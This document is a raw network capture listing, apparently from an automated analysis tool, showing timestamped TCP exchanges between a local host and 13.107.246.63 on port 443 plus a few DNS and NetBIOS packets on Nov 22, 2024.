                                                                                                                                                                                                            Nov 22, 2024 04:27:58.053560972 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.076436043 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.076500893 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.076558113 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.081705093 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.081729889 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.081739902 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.081746101 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.087569952 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.087600946 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.087677956 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.088381052 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.088397026 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.300956964 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.301857948 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.301882029 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.302427053 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.302433968 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.485599995 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.486321926 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.486347914 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.486984968 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.486991882 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.758610010 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761600018 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761679888 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761703968 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761785984 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761930943 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761930943 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761930943 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.761960983 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.765533924 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.765580893 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.765678883 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.765896082 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.765911102 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.945286036 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948513985 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948592901 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948635101 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948648930 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948663950 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.948671103 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.951931953 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.951966047 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.952059031 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.952229977 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.952246904 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.069828987 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.069855928 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.368583918 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.369210005 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.369256973 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.369689941 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.369698048 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.812643051 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.815763950 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.818612099 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.818772078 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.818772078 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.818802118 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.818814039 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.823482037 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.823529005 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.823632002 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.823812962 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.823828936 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.850928068 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.853127956 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.853147030 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.853844881 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.853849888 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.883793116 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.886267900 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.886298895 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.886909962 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:59.886915922 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.294337034 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.297477961 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.300364017 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.300421000 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.300441027 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.300472021 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.300477982 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.303792953 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.303836107 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.303931952 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.304114103 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.304127932 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.329668045 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.332746983 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.336399078 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.336445093 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.336467981 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.336482048 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.336488962 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.339833021 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.339881897 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.339982986 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.340159893 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.340176105 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.569468021 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.572779894 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.572808981 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.573767900 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.573785067 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.669935942 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.670613050 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.670638084 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.671226025 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:00.671236038 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.010530949 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013674021 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013783932 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013782978 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013854980 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013923883 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013952971 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013966084 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.013971090 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.017424107 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.017476082 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.017555952 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.017875910 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.017899990 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.106132984 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109251022 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109318018 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109374046 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109395027 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109417915 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.109426022 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.112787962 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.112845898 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.112931967 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.113102913 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.113132000 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.671658039 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.672260046 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.672281027 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.672918081 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:01.672924995 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.035214901 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.035643101 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.035670042 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.036115885 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.036122084 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.087688923 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.088386059 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.088413000 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.088937044 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.088956118 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.124174118 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127154112 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127207994 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127228975 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127274036 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127334118 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127361059 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127361059 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127382994 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.127393007 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.130346060 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.130395889 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.130458117 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.130634069 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.130651951 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488423109 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488564014 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488622904 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488734007 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488759995 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488773108 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.488780022 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.492094040 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.492199898 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.492286921 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.492434978 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.492470980 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.628415108 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.631498098 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.631735086 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.631735086 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.631735086 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.634870052 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.634926081 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.635014057 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.635360956 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.635376930 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.734159946 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.736392021 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.736409903 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.736965895 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.736973047 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.923654079 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.928400993 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.928464890 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.929167986 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.929183006 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.940891027 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.940918922 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.168126106 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.171214104 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.174742937 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.174815893 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.174815893 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.174840927 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.174865007 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.179444075 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.179527044 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.179613113 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.179879904 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.179908037 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.371169090 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374279976 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374438047 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374759912 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374799967 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374830961 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.374845982 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.378520966 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.378588915 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.378691912 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.379280090 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.379311085 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.981293917 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.981920958 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.981986046 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.982644081 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:03.982660055 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.207647085 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.208667040 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.208759069 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.209798098 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.209814072 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.350081921 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.350739956 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.350800991 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.351605892 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.351622105 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.432375908 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.435836077 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.435910940 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.436011076 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.436065912 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.436108112 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.436125994 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.440089941 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.440133095 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.440208912 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.440418005 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.440431118 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.643677950 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.646769047 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.646842957 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.646939039 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.646960020 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.650818110 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.650846958 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.651046991 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.651400089 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.651415110 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.790518999 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.793842077 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.793926954 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.794106960 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.794152021 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.794182062 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.794198990 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.798054934 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.798146963 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.798233986 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.798559904 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:04.798588991 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:05.030468941 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:05.031183958 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:05.031238079 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:05.031968117 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:28:05.031982899 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.186382055 CET6449553192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.327611923 CET53644951.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:17.688570976 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                            Nov 22, 2024 04:26:32.365082979 CET53573301.1.1.1192.168.2.4
